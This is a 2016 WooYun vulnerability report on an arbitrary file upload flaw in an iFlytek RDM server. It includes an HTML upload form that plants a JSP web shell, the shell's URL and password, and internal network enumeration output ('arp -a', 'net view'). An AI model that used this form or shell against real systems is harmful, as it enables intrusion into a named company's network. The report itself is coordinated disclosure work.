当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0211667

漏洞标题:科大讯飞某系统修复不当可任意文件上传已shell可内网

相关厂商:iflytek.com

漏洞作者: 路人甲

提交时间:2016-05-22 15:04

修复时间:2016-07-06 16:10

公开时间:2016-07-06 16:10

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-22: 细节已通知厂商并且等待厂商处理中
2016-05-22: 厂商已经确认,细节仅向厂商公开
2016-06-01: 细节向核心白帽子及相关领域专家公开
2016-06-11: 细节向普通白帽子公开
2016-06-21: 细节向实习白帽子公开
2016-07-06: 细节向公众公开

简要描述:

任意文件上传已shell可内网

详细说明:

讯飞RDM系统
http://rdm.iflytek.com:2000/
构造本地上传页面

<html>
<form action="http://rdm.iflytek.com:2000/upload?dir=cmVwb3NpdG9yeQ==&name=d3BwMS5qc3A=&start=0&size=7000&" method="post" enctype="multipart/form-data">
<input type='file' name='file' />
<input type='hidden' name='filename' value="null" />
<input type='hidden' name='id type=' value="" />
<input type="submit" value='提 交' name="Submit"></form>
repository/000000000/wpp1.jsp
</html>

漏洞证明:

shell:http://rdm.iflytek.com:2000/repository/000000000/wpp1.jsp
密码:023

QQ截图20160522132743.png


[*] 基本信息 [ C:D:E:F: ]
D:\Program Files\Bronzesoft\RDM\Application\rdmapp\power\> arp -a
接口: 192.168.75.68 --- 0x10
Internet 地址 物理地址 类型
169.254.176.137 78-2b-cb-2a-a2-9a 动态
192.168.75.1 70-ba-ef-73-b3-00 动态
192.168.75.3 e4-11-5b-0c-54-c0 动态
192.168.75.6 00-1e-c9-e9-cc-58 动态
192.168.75.11 00-90-0b-18-d4-4d 动态
192.168.75.14 22-7a-83-b7-95-aa 动态
192.168.75.29 ec-f4-bb-c7-3e-58 动态
192.168.75.31 78-2b-cb-2a-a2-9a 动态
192.168.75.55 e0-db-55-1e-d8-70 动态
192.168.75.69 00-1e-4f-3d-e2-4c 动态
192.168.75.90 e4-11-5b-0c-52-6c 动态
192.168.75.98 9a-34-2f-43-ee-d3 动态
192.168.75.100 00-0f-1f-6d-8e-eb 动态
192.168.75.101 00-1c-54-69-e8-c3 动态
192.168.75.112 d4-ae-52-6f-82-72 动态
192.168.75.118 b4-99-ba-bb-d4-2a 动态
192.168.75.119 00-90-0b-17-7b-e9 动态
192.168.75.121 98-4b-e1-01-9b-4a 动态
192.168.75.122 e4-11-5b-11-2d-84 动态
192.168.75.124 00-1c-54-30-2c-83 动态
192.168.75.126 1c-c1-de-1e-88-2a 动态
192.168.75.135 f2-89-89-04-7c-8d 动态
192.168.75.137 7e-af-cd-55-69-ee 动态
192.168.75.146 74-86-7a-e2-ff-a0 动态
192.168.75.155 00-1b-78-39-1c-00 动态
192.168.75.156 00-25-b3-1b-48-24 动态
192.168.75.167 d4-ae-52-ab-15-53 动态
192.168.75.169 b8-ca-3a-f7-03-6a 动态
192.168.75.170 14-18-77-34-aa-73 动态
192.168.75.184 00-14-5e-2a-6a-eb 动态
192.168.75.199 00-1a-a0-0c-5a-64 动态
192.168.75.209 18-a9-05-65-88-8a 动态
192.168.75.241 b4-99-ba-c0-5e-c8 动态
192.168.75.250 00-01-29-50-f7-f0 动态
192.168.75.255 ff-ff-ff-ff-ff-ff 静态
224.0.0.22 01-00-5e-00-00-16 静态
224.0.0.252 01-00-5e-00-00-fc 静态
239.255.255.250 01-00-5e-7f-ff-fa 静态
255.255.255.255 ff-ff-ff-ff-ff-ff 静态
D:\Program Files\Bronzesoft\RDM\Application\rdmapp\power\> net view
服务器名称 注解
-------------------------------------------------------------------------------
\\77-99-YYZY
\\BAOXIAO
\\CHANPINBAO
\\EMBEDDED-1
\\HPDL380
\\NDOMAINSVR
\\NEWDOMAINBK2
\\RDM
\\RDM1
\\SHARE
\\SVCTAG-GVB7B3X
\\SVN-169
\\TECHCENT
\\US3
\\WIN-82MES14V4GQ
\\WIN-HUQHMVI2UV5
\\XFDATA
\\YYZY-03
命令成功完成。
D:\Program Files\Bronzesoft\RDM\Application\rdmapp\power\>


QQ截图20160522132827.png

修复方案:

补丁or下线,删除shell

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-05-22 15:34

厂商回复:

哔狗了,已开始处理,感谢提交

最新状态:

暂无